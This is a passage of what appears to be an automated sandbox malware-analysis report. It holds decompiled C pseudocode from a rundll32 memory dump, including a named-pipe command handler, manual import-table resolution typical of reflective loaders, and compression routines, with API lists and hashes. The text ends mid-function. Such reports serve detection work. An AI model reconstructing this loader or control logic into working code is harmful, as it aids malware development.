            0x0346e4ca
            0x0346e4cb
            0x0346e4d1
            0x0346e4e2
            0x0346e4e7
            0x00000000
            0x0346e4e9
            0x0346e4f6
            0x0346e4fe
            0x00000000
            0x0346e500
            0x0346e502
            0x0346e50a
            0x00000000
            0x0346e50c
            0x0346e50f
            0x0346e515
            0x0346e515
            0x0346e50a
            0x0346e4fe
            0x0346e4e7
            0x0346e538

            APIs
            • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E498
            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E4A9
            • CoCreateInstance.OLE32(0347C8A0,00000000,00000001,0347C8B0,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E4C0
            • SysAllocString.OLEAUT32(00000000), ref: 0346E4CB
            • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0346E7B4,00000E16,00000000,00000000,00000005), ref: 0346E4F6
              • Part of subcall function 03468DC9: RtlAllocateHeap.NTDLL(00000008,?,?,03469793,00000100,?,0346661B), ref: 03468DD7
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
            • String ID:
            • API String ID: 1610782348-0
            • Opcode ID: c4e3129caa0c34ae8d208830a91fa5ce664af4740b774380aeec7d2c2c0fb540
            • Instruction ID: 755c5b3e9a1ccae46e9f90e0eaf41b5f84ec204eda0a05a72e3c88a61c54fa04
            • Opcode Fuzzy Hash: c4e3129caa0c34ae8d208830a91fa5ce664af4740b774380aeec7d2c2c0fb540
            • Instruction Fuzzy Hash: C6214974600245BFEB249FA2DD5CEABBFBCEFC2B15F10015EB505AA290D7719A40CA71
            Uniqueness

            Uniqueness Score: -1.00%

            Function 034733DA Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85stringCOMMON
            Download Yara Rule
            C-Code - Quality: 83%
            			E034733DA(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L03473533();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E034733B3(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E03468ECB(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x3471bc5
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}













            0x034733da
            0x034733dd
            0x034733e2
            0x034733e6
            0x034733e6
            0x034733ec
            0x034733f0
            0x034733f1
            0x034733f4
            0x034733f5
            0x034733fa
            0x034733fd
            0x034733fe
            0x03473403
            0x0347340a
            0x03473493
            0x03473493
            0x00000000
            0x03473415
            0x03473416
            0x03473428
            0x0347344e
            0x0347344e
            0x03473457
            0x03473459
            0x0347345f
            0x0347348e
            0x0347348e
            0x03473496
            0x03473499
            0x03473499
            0x03473461
            0x03473462
            0x03473468
            0x0347346a
            0x0347346a
            0x0347346f
            0x0347346e
            0x0347346e
            0x03473476
            0x03473482
            0x0347348c
            0x0347348c
            0x00000000
            0x03473438
            0x03473438
            0x03473438
            0x0347343e
            0x00000000
            0x00000000
            0x03473440
            0x03473446
            0x0347344b
            0x00000000
            0x0347344b
            0x03473428

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: strchr$_snprintf
            • String ID: %.*g
            • API String ID: 3619936089-952554281
            • Opcode ID: 623a954ee8ffdf06cba5aa1ffa4f729f7cc1058997cdedb43aeb77259d18f618
            • Instruction ID: 97b99a9a789d9b28d444f573d05515c2587ef3e316b0721b8027ef44f186f2b0
            • Opcode Fuzzy Hash: 623a954ee8ffdf06cba5aa1ffa4f729f7cc1058997cdedb43aeb77259d18f618
            • Instruction Fuzzy Hash: 0621573A6047146ADB2BDE2DEC85BEF779C9F01A64F1800ABF8448E280E7A5D94153DD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03463775 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310pipeCOMMON
            Download Yara Rule
            C-Code - Quality: 62%
            			E03463775(void* __fp0) {
				signed int _v144;
				signed int _v152;
				char _v160;
				char _v164;
				char _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t110;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t136;
				signed int _t145;
				signed int _t147;
				signed short* _t148;
				signed int _t158;
				intOrPtr* _t182;
				void* _t186;
				void* _t187;
				void* _t188;
				signed short* _t191;
				void* _t195;
				signed int _t198;
				signed int _t199;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t207;
				void* _t209;
				void* _t215;
				void* _t222;

				_t222 = __fp0;
				_t209 = (_t207 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x347f8d0; // 0x50ff8c0
					_push(0);
					_push( *0x347f8b4);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x347f8d0; // 0x50ff8c0
					_push(0x80000);
					_push( *0x347f974);
					_push( *0x347f8b4);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t148 =  *0x347f974; // 0x0
						_t80 =  *_t148 & 0x0000ffff;
						_t215 = _t80 - 8;
						if(_t215 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E034709C3( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t186);
								E0346D297(_t186);
								L32:
								L56:
								DisconnectNamedPipe( *0x347f8b4);
								_push(0);
								_pop(0);
								_push(1);
								_pop(1);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E034616B0( &_v204, _t222);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t145 = _v204;
								_t90 = _t145 * 0x16;
								_v184 = _t145 * 0x16;
								_t203 = E03468DC9(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t187 = 0xa;
									E0346D297(_t187);
									L52:
									E03468DDF( &_v188, _t145);
									goto L32;
								}
								_t198 = 0;
								__eflags = _t145;
								if(_t145 == 0) {
									L50:
									_push(E0346A5D0(_t203));
									_push(_t203);
									_t188 = 5;
									E0346D297(_t188);
									E03468DDF( &_v192, 0xffffffff);
									_t209 = _t209 + 0x10;
									goto L52;
								}
								_t158 = _v188 + 4;
								__eflags = _t158;
								_v204 = _t158;
								do {
									__eflags = _t198;
									if(_t198 != 0) {
										__eflags = _t198 - _t145 - 1;
										if(_t198 < _t145 - 1) {
											_t102 = E0346A5D0(_t203);
											_t158 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t158;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E0346A5D0(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E0346A5D0(_t203) + _t203;
										__eflags = _t110;
										E03469FA5(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t158 = _v204;
										_t209 = _t209 + 0x20;
									}
									_t198 = _t198 + 1;
									_t158 = _t158 + 0x20;
									_v204 = _t158;
									__eflags = _t198 - _t145;
								} while (_t198 < _t145);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E034616B0( &_v204, _t222);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E03468DDF( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t215 == 0) {
							_t84 = E034709C3( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t199 = E03469D29( &(_t148[4]), 0x20, 1,  &_v176);
							_v196 = _t199;
							__eflags = _t199;
							if(_t199 == 0) {
								L30:
								_t191 =  *0x347f974; // 0x0
								E0346A06E( &_v164,  &(_t191[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E03461D97(E0346A102( *_t199, __eflags), 0, 0, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E03468DC9(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t147 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E03461D97(E0346A102( *_t199, __eflags), _t127, _v184, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t129;
								E03469E22( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E03469A76( *((intOrPtr*)(_t199 + _t147 * 4)), E0346A5D0( *((intOrPtr*)(_t199 + _t147 * 4))));
								_t182 = _v204;
								_t147 = _t147 + 1;
								 *_t182 = _t132;
								_v204 = _t182 + 4;
								__eflags = _t147 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t195 = 5;
							E0346D297(_t195);
							 *0x347f9a8 = 1;
							_v172 = 1;
							goto L56;
						}
						_t136 = _t133;
						if(_t136 == 0) {
							_t84 = E034709A1( &_v200);
							goto L16;
						}
						if(_t136 != 1) {
							goto L56;
						}
						E034709A1( &_v200);
						goto L12;
					}
				}
				return 0;
			}
























































            0x03463775
            0x0346377b
            0x03463788
            0x0346378d
            0x03463791
            0x03463791
            0x03463796
            0x03463797
            0x0346379d
            0x034637a9
            0x00000000
            0x00000000
            0x034637bc
            0x034637c1
            0x034637c2
            0x034637c7
            0x034637cc
            0x034637d2
            0x034637e0
            0x03463aec
            0x00000000
            0x034637f1
            0x034637f1
            0x034637f7
            0x034637fa
            0x034637fd
            0x0346396b
            0x0346396b
            0x0346396e
            0x03463ae2
            0x0346382c
            0x0346382d
            0x03463831
            0x03463831
            0x03463833
            0x03463833
            0x03463834
            0x0346394f
            0x0346394f
            0x03463950
            0x03463955
            0x03463af2
            0x03463af8
            0x03463b03
            0x03463b05
            0x03463b06
            0x03463b08
            0x03463b09
            0x00000000
            0x00000000
            0x00000000
            0x03463b09
            0x03463975
            0x03463975
            0x03463978
            0x034639bd
            0x034639c1
            0x034639c6
            0x034639ca
            0x034639cc
            0x03463acd
            0x03463ad3
            0x03463ad7
            0x03463852
            0x03463852
            0x00000000
            0x03463852
            0x034639d2
            0x034639d6
            0x034639da
            0x034639e3
            0x034639e5
            0x034639ea
            0x034639ec
            0x03463aa7
            0x03463aa7
            0x03463aa7
            0x03463ab0
            0x03463ab2
            0x03463ab5
            0x03463ab6
            0x03463abd
            0x03463ac3
            0x00000000
            0x03463ac3
            0x034639f2
            0x034639f4
            0x034639f6
            0x03463a85
            0x03463a8c
            0x03463a8d
            0x03463a90
            0x03463a91
            0x03463a9d
            0x03463aa2
            0x00000000
            0x03463aa2
            0x03463a00
            0x03463a00
            0x03463a03
            0x03463a07
            0x03463a07
            0x03463a09
            0x03463a0e
            0x03463a10
            0x03463a13
            0x03463a19
            0x03463a1d
            0x03463a1d
            0x03463a10
            0x03463a23
            0x03463a25
            0x03463a29
            0x03463a2b
            0x03463a2e
            0x03463a35
            0x03463a3e
            0x03463a44
            0x03463a49
            0x03463a52
            0x03463a6a
            0x03463a6a
            0x03463a6d
            0x03463a72
            0x03463a76
            0x03463a76
            0x03463a79
            0x03463a7a
            0x03463a7d
            0x03463a81
            0x03463a81
            0x00000000
            0x03463a07
            0x0346397a
            0x0346397d
            0x00000000
            0x00000000
            0x03463987
            0x0346398b
            0x03463990
            0x03463994
            0x03463998
            0x0346399a
            0x034639a2
            0x034639a8
            0x034639ac
            0x034639b0
            0x00000000
            0x034639b0
            0x03463803
            0x03463961
            0x03463845
            0x03463846
            0x03463848
            0x03463850
            0x03463851
            0x00000000
            0x03463851
            0x0346384a
            0x00000000
            0x0346384a
            0x03463809
            0x0346380c
            0x03463884
            0x03463886
            0x0346388c
            0x0346388e
            0x0346392b
            0x0346392b
            0x0346393d
            0x03463943
            0x0346394c
            0x0346394d
            0x00000000
            0x0346394d
            0x03463894
            0x03463898
            0x0346389b
            0x0346391f
            0x03463924
            0x03463927
            0x00000000
            0x03463927
            0x0346389d
            0x034638a0
            0x034638a8
            0x034638ad
            0x034638b2
            0x034638b4
            0x00000000
            0x00000000
            0x034638b8
            0x034638b9
            0x034638bb
            0x034638ea
            0x034638f9
            0x034638fe
            0x03463901
            0x0346390d
            0x00000000
            0x0346390d
            0x034638bd
            0x034638c1
            0x034638cf
            0x034638d4
            0x034638d8
            0x034638d9
            0x034638de
            0x034638e2
            0x034638e2
            0x034638e6
            0x00000000
            0x034638e6
            0x0346380e
            0x03463811
            0x03463859
            0x0346385a
            0x0346385d
            0x0346385e
            0x03463865
            0x0346386b
            0x00000000
            0x0346386b
            0x03463814
            0x03463817
            0x03463840
            0x00000000
            0x03463840
            0x0346381c
            0x00000000
            0x00000000
            0x03463827
            0x00000000
            0x03463827
            0x034637e0
            0x03463b17

            APIs
            • GetLastError.KERNEL32 ref: 034637AB
              • Part of subcall function 0346D297: FlushFileBuffers.KERNEL32(00000000,?,03463ABB,00000000,00000004), ref: 0346D2DD
            • DisconnectNamedPipe.KERNEL32 ref: 03463AF8
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
            • String ID: %u.%u.%u.%u:%u
            • API String ID: 465096328-3858738763
            • Opcode ID: c97bf42690e5beca3d1f9538bfd4d39bd2112b618ea5024d9a7b123236b0d0da
            • Instruction ID: e9e80b0f6b33f6b823e3ce8685b1ac861a6b50bd13abc99c241d613b84e5a79f
            • Opcode Fuzzy Hash: c97bf42690e5beca3d1f9538bfd4d39bd2112b618ea5024d9a7b123236b0d0da
            • Instruction Fuzzy Hash: 7CA1C0BA508341AFD314EF65D884A6BB7E8EB84310F08492FF5559F290EB34D9098F5B
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0347376C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 50%
            			E0347376C(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0346F024(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























            0x0347376c
            0x03473772
            0x0347377a
            0x0347378f
            0x034737a1
            0x034737ad
            0x034737b3
            0x034737b8
            0x034737c4
            0x0347392f
            0x00000000
            0x0347392f
            0x034737ca
            0x034737d3
            0x034737e1
            0x034737e4
            0x034737f3
            0x034737f3
            0x034737fa
            0x03473808
            0x0347380b
            0x0347381b
            0x03473828
            0x0347382f
            0x0347383f
            0x03473851
            0x03473857
            0x03473841
            0x03473849
            0x03473849
            0x0347385a
            0x0347385e
            0x0347386a
            0x0347386e
            0x03473872
            0x03473876
            0x03473882
            0x034738ad
            0x034738b5
            0x034738bb
            0x034738c7
            0x034738d3
            0x03473884
            0x03473889
            0x03473894
            0x034738a0
            0x034738a0
            0x034738dc
            0x034738e2
            0x034738ec
            0x03473908
            0x034738ee
            0x034738f1
            0x034738fd
            0x034738fd
            0x034738ec
            0x03473910
            0x03473919
            0x03473919
            0x03473927
            0x00000000
            0x03473927
            0x03473833
            0x00000000
            0x03473833
            0x00000000
            0x0347380b
            0x00000000

            APIs
            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 03473789
            • LoadLibraryA.KERNEL32(00000000), ref: 03473822
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, Offset: 03460000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_3460000_rundll32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID: GetProcAddress$kernel32.dll
            • API String ID: 4133054770-1584408056
            • Opcode ID: 897d2aab6daf8e783abac95ade05c129dbd227a1656ae5c2453567bdd9aea423
            • Instruction ID: c654787b19b9d68931822d8178d2c4a1c18965d6624ff0bf5ba1c94832959534
            • Opcode Fuzzy Hash: 897d2aab6daf8e783abac95ade05c129dbd227a1656ae5c2453567bdd9aea423
            • Instruction Fuzzy Hash: 6B616DB9900209EFDB00CF98C585BEDBBF1BF08315F24859AE465AB351D374AA81DF94
            Uniqueness

            Uniqueness Score: -1.00%

            Function 03474160 Relevance: 6.6, APIs: 5, Instructions: 341COMMON
            Download Yara Rule
            C-Code - Quality: 99%
            			E03474160(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x5d08408b
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0x51ec8b55
					_t12 = _t272 + 0x5c; // 0xee85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E03477180(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E03475EE0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xee85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E03476020( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0x51ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0x51ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8508458b
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0x51ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0x51ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0x830a74c0
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xee85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
